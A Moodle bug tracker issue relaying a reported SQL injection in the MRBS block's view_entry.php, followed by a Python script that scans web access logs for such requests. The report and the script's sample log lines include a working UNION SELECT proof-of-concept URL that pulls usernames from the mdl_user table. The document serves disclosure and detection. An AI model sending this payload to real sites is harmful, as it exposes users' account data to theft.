- Bug
- Resolution: Fixed
- Critical
- 1.8.2
- None
- Uncertain
- Any
- MOODLE_18_STABLE
- MOODLE_18_STABLE
Hi,
A colleague passed along the following link to a potential security issue with Moodle 1.8.2. We cannot locate this "ing/blocks/mrdb/" path, so are not certain where in the stack the issue may surface, if at all. Might this be an add-on? (Apologies if this is a repeat of another issue: I did a search and could not find it.)
http://www.securityfocus.com/archive/1/485434
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=[SQL]&day=27&month=10&year=2007
And a POC:
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007
Thanks,
Jim
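For anyone checking whether a site received requests of the shape reported above, the following is an added example (not part of the original report, and not Moodle or MRBS code). It scans web server access-log lines for view_entry.php requests whose id, day, month or year parameter is not a plain number. The log format (Apache/nginx "combined") and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the reported URL passes as plain numbers.
NUMERIC_PARAMS = ("id", "day", "month", "year")
# Path suffix taken from the report; the install prefix varies per site.
TARGET_SCRIPT = "/blocks/mrbs/code/web/view_entry.php"
# Assumption: "combined" log format; only the quoted request line is used.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_HINT_RE = re.compile(r"\b(union|select|from|where)\b", re.IGNORECASE)

def check_line(line):
    """Return (param, decoded_value, reason) findings for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith(TARGET_SCRIPT):
        return []
    findings = []
    # parse_qs percent-decodes values, so %20UNION%20SELECT becomes readable.
    params = parse_qs(url.query, keep_blank_values=True)
    for name in NUMERIC_PARAMS:
        for value in params.get(name, []):
            if re.fullmatch(r"\d{1,10}", value):
                continue  # a plain integer is what the page expects
            reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-numeric"
            findings.append((name, value, reason))
    return findings

def scan(lines):
    """Return (line_number, finding) pairs for every suspicious request."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in check_line(line)]

# Constructed sample log lines (documentation IP addresses, made-up sizes).
PREFIX = "/moodle/blocks/mrbs/code/web/view_entry.php"
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Oct/2007:10:00:00 +0000] "GET ' + PREFIX
    + '?id=12&day=27&month=10&year=2007 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Oct/2007:10:02:13 +0000] "GET ' + PREFIX
    + '?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id'
    + '%20FROM%20mdl_user%20WHERE%20id=2&day=27&month=10&year=2007 HTTP/1.1" 200 4800',
    '192.0.2.10 - - [27/Oct/2007:10:05:41 +0000] "GET ' + PREFIX
    + '?id=12abc&day=27&month=10&year=2007 HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for lineno, (param, value, reason) in scan(SAMPLE_LOG):
        print(f"line {lineno}: {param}={value!r} ({reason})")
```

A match only shows that such a request was received; whether it reached the database depends on how the installed block handles the parameter.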